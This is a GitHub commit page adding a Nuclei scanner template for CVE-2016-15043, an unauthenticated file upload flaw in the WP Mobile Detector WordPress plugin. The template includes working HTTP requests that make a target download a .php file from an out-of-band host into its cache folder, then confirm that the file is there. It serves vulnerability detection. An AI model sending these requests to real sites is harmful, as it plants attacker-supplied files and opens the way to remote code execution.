Skip to content

Commit 6cd83ab

Browse files
authored
Merge pull request #14674 from D3nverNg/cve-2-1
Added CVE-2016-15043 template
2 parents 8ea786b + c52024a commit 6cd83ab

File tree

1 file changed

+56
-0
lines changed

1 file changed

+56
-0
lines changed

http/cves/2016/CVE-2016-15043.yaml

Lines changed: 56 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,56 @@
1+
id: CVE-2016-15043
2+
3+
info:
4+
name: WP Mobile Detector <= 3.5 - Unrestricted File Upload
5+
author: D3nverNg,thewindghost
6+
severity: critical
7+
description: |
8+
WP Mobile Detector plugin for WordPress <= 3.5 contains an unrestricted file upload vulnerability caused by missing file type validation in resize.php, letting unauthenticated attackers upload arbitrary files, potentially leading to remote code execution.
9+
impact: |
10+
Unauthenticated attackers can upload arbitrary files, potentially leading to remote code execution and full server compromise.
11+
remediation: |
12+
Update to the latest version of WP Mobile Detector plugin.
13+
reference:
14+
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb
15+
- https://www.pluginvulnerabilities.com/2016/05/31/aribitrary-file-upload-vulnerability-in-wp-mobile-detector/
16+
- https://wpscan.com/vulnerability/e4739674-eed4-417e-8c4d-2f5351b057cf/
17+
classification:
18+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
19+
cvss-score: 9.8
20+
cve-id: CVE-2016-15043
21+
cwe-id: CWE-434
22+
metadata:
23+
verified: true
24+
max-request: 2
25+
tags: cve,cve2016,wordpress,wp,wp-plugin,file-upload,rce,intrusive,kev,vkev
26+
27+
variables:
28+
filename: "{{rand_text_alpha(8)}}.php"
29+
30+
flow: http(1) && http(2)
31+
32+
http:
33+
- raw:
34+
- |
35+
GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://{{interactsh-url}}/{{filename}} HTTP/1.1
36+
Host: {{Hostname}}
37+
38+
matchers:
39+
- type: dsl
40+
dsl:
41+
- 'contains(interactsh_protocol, "http")'
42+
- 'contains(content_type, "image/gif")'
43+
condition: and
44+
internal: true
45+
46+
- raw:
47+
- |
48+
GET /wp-content/plugins/wp-mobile-detector/cache/{{filename}} HTTP/1.1
49+
Host: {{Hostname}}
50+
51+
matchers:
52+
- type: dsl
53+
dsl:
54+
- status_code == 200
55+
- regex('<body>(.*?)</body>', body)
56+
condition: and

0 commit comments

Comments
 (0)